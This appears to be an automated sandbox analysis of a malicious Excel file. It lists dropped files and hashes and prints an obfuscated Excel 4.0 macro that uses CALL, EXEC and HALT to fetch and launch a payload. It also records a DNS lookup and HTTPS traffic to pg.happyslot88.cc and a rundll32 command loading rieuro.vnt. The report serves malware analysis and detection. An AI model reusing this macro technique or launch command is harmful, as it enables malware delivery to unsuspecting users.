                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 02:14:39 2021, atime=Tue Feb 23 02:14:39 2021, length=16384, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.4845695826305105
                Encrypted:false
                SSDEEP:12:85Q3D3rLgXg/XAlCPCHaXtB8XzB/2kxKX+WnicvbSubDtZ3YilMMEpxRljK1TdJU:85o/XTd6jAYepDv3qgrNru/
                MD5:7313B0AC32127A61D8F6BA625F92BE67
                SHA1:CECF8D0E22AAB14DFACDB6C298803087FEEE2398
                SHA-256:A9B9E47C2F5B56D8D1A72C05A9C86C936120D3F0C9D3E037F41FEB51F6B6362E
                SHA-512:9A7CABB727A0F8EF0042E93F5199245017AF22D1B33EFBBB6697279E5DE8A2566F381036ECF35581ADE3214A6B19A7EF0C8452A35841B199C8BF6548104AEB00
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G...?_......?_......@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WR....Desktop.d......QK.XWR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.15528.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Feb 23 02:14:27 2021, mtime=Tue Feb 23 02:14:39 2021, atime=Tue Feb 23 02:14:39 2021, length=93696, window=hide
                Category:dropped
                Size (bytes):2198
                Entropy (8bit):4.560766324022141
                Encrypted:false
                SSDEEP:48:8R/i/XT0jA+HhHK2XUHhHKBgQh2R/i/XT0jA+HhHK2XUHhHKBgQ/:8R/i/XojA+hK7KBgQh2R/i/XojA+hK7w
                MD5:B508EE36EE01C91C96F6C1F8F86BB0F5
                SHA1:2E9BB64A08A1F1CCB2A2EC331321E6F11F48C251
                SHA-256:EFE6A5BD1E00C12F206EB29289F7B5AFAA12E20AD2B61FE03441FD4CEA72288D
                SHA-512:C01E84249D794FAC8FF9BFA2EB4C138386A8CE9296ADC86FC14C29309AB816E49F8E41FDF35CBACDD75AB437D72B60E5D354FF0A8BBE8135BA8D3AF662DCBE09
                Malicious:false
                Reputation:low
                Preview: L..................F.... ...'.G......?_.....8cf......n...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WR....Desktop.d......QK.XWR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..n..WR.. .SECURI~1.XLS..l......WR..WR..*...9&....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...1.5.5.2.8...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\SecuriteInfo.com.Heur.15528.xls.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...1.5.5.2.8...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):134
                Entropy (8bit):4.809828785316945
                Encrypted:false
                SSDEEP:3:oyBVomM0bMd2uscbMd2mM0bMd2v:dj60QdnQdo0QdI
                MD5:EE6FA409E8ED43C891798BA77318257D
                SHA1:E9576B630EAE205D4C4C37B178354765D1558791
                SHA-256:98381D63007FDFA63A87B0CE5162CF624FF98525A4B68F5F8C0D992CE569CAFC
                SHA-512:0768E0640E89F2937C88469E88A3CDA14E150D9F4C1E3E4B7B8F3050EA575962A975EBEE3A78681105D3BF624C274AE613E2C7AD1AD06E174417D52BCB094C4C
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.15528.LNK=0..SecuriteInfo.com.Heur.15528.LNK=0..[xls]..SecuriteInfo.com.Heur.15528.LNK=0..
                C:\Users\user\Desktop\12DE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Applesoft BASIC program data, first line number 16
                Category:dropped
                Size (bytes):143520
                Entropy (8bit):4.480462866504305
                Encrypted:false
                SSDEEP:3072:oJxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFVpXUmmJxEtjPOtioVjDGUU1qfDlaG2:ixEtjPOtioVjDGUU1qfDlavx+W2QnAF/
                MD5:EC567F490E9FF7740A5C204A059E8AEE
                SHA1:18D821DB3EC8D6FADE8C29F803D3CFF227606BAC
                SHA-256:DB5E6FC93D92A5397F7C62D64B08BEC11F8934E8BE3180D5F8C16BDD7DBA737B
                SHA-512:95C28F82C84E0D99E2F985B915FD1FC2CDC20E81293327F22485DCD0D2A55649A2E68EE8613761B8A259C95A5B9890C350E3D3960F05D9A61FF15C3771486D0B
                Malicious:false
                Reputation:low
                Preview: ........g2.........................\.p.... B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 22 11:58:55 2021, Security: 0
                Entropy (8bit):3.473104569518557
                TrID:
                • Microsoft Excel sheet (30009/1) 78.94%
                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                File name:SecuriteInfo.com.Heur.15528.xls
                File size:93696
                MD5:5a75c6184001a6b8785206f1e2121290
                SHA1:b3ec9fbcc5e96c45e74d503210a51a7ee5ce8132
                SHA256:c71bd3833fbb10cd2f845c83a6ed957f3243990de48a74b4d5cf1602303f4bb1
                SHA512:d1d29f02ae53f7fe04ebab4e628d0e30f0f9f4c1bbe58ef3eed9bc3f44d0b2af4b8df2b81fbcd75ba083f77c52a7827cbb6b089382f3d8c9d6aae12bf8cf2760
                SSDEEP:1536:ca7uDphYHceXVhca+fMHLtyeGxcl8O9pTI4XUXmRgb05SXw1OTsRKvoNGrEJcQ:ca7uDphYHceXVhca+fMHLtyeGxcl8O9v
                File Content Preview:........................>......................................................................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "SecuriteInfo.com.Heur.15528.xls"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2021-02-22 11:58:55
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Document Code Page:1251
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:917504

                Streams

                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.337819969156
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.250492291218
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . ) ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 83229
                General
                Stream Path:Workbook
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:83229
                Entropy:3.67638531123
                Base64 Encoded:True
                Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                Macro 4.0 Code

                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AS110&Doc2!AS111&""2 "",AD15)","=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AT110,AE15)","=FORMULA(Doc2!AV105&Doc2!AV107&Doc2!AV109,AF15)",,,,,,,,,,,,,,,,=AE14(),=before.2.6.28.sheet!AD19(),=AJ19(),,,,,,,,,=before.2.6.28.sheet!AF20(),,,,,,,,,,,,,,,,"=REPLACE(Doc2!AP102&Doc2!AQ102,6,1,before.2.6.28.sheet!AE19)",,,,,,"=REPLACE(Doc2!AT94,6,1,Doc2!AT95)",,"=CALL(AF15,before.2.6.28.sheet!AD21&before.2.6.28.sheet!AD20&before.2.6.28.sheet!AD19&""A"",""JJC""&""CBB"",0,Doc3!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&Doc2!AT99,0)","=REPLACE(Doc2!AP103,7,7,Doc2!AP101&Doc2!AQ101)",,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(before.2.6.28.sheet!AD15&Doc2!AT99&before.2.6.28.sheet!AE15&AJ19)",,,,=AL19(),,=AF17(),"=REPLACE(Doc2!AP104&Doc2!AQ104&Doc2!AR104,7,7,"""")",,=HALT(),,,,,,,=before.2.6.28.sheet!AF14(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                Network Behavior

                Network Port Distribution

                TCP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Feb 22, 2021 19:15:08.362785101 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:08.588846922 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:08.589133978 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:08.606528044 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:08.829839945 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:08.836025000 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:08.836070061 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:08.836100101 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:08.836255074 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:08.836307049 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:08.853079081 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:09.074079990 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:09.074105978 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:09.074193954 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:10.710575104 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:10.931607008 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:11.475409031 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:11.475595951 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:11.476356030 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:11.485536098 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:11.485574007 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:11.485634089 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:11.485671997 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120
                Feb 22, 2021 19:15:11.697278976 CET | 443 | 49167 | 139.162.8.120 | 192.168.2.22
                Feb 22, 2021 19:15:11.697415113 CET | 49167 | 443 | 192.168.2.22 | 139.162.8.120

                UDP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Feb 22, 2021 19:15:07.982551098 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 19:15:08.343070984 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                Feb 22, 2021 19:15:09.406263113 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 19:15:09.471498966 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                Feb 22, 2021 19:15:09.481528044 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 19:15:09.530570984 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                Feb 22, 2021 19:15:10.121028900 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 19:15:10.189224005 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
                Feb 22, 2021 19:15:10.200612068 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 19:15:10.252123117 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22

                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Feb 22, 2021 19:15:07.982551098 CET | 192.168.2.22 | 8.8.8.8 | 0x80ac | Standard query (0) | pg.happyslot88.cc | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Feb 22, 2021 19:15:08.343070984 CET | 8.8.8.8 | 192.168.2.22 | 0x80ac | No error (0) | pg.happyslot88.cc | (none) | 139.162.8.120 | A (IP address) | IN (0x0001)

                HTTPS Packets

                Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                Feb 22, 2021 19:15:08.836070061 CET | 139.162.8.120 | 443 | 192.168.2.22 | 49167 | CN=pg.happyslot88.cc | CN=R3, O=Let's Encrypt, C=US | Mon Feb 01 08:41:15 CET 2021 | Sun May 02 09:41:15 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
                (certificate chain, intermediate) | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |

                Code Manipulations

                Statistics

                Behavior


                System Behavior

                General

                Start time:19:14:36
                Start date:22/02/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f190000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:19:14:42
                Start date:22/02/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\rieuro.vnt,DllRegisterServer
                Imagebase:0xff950000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis
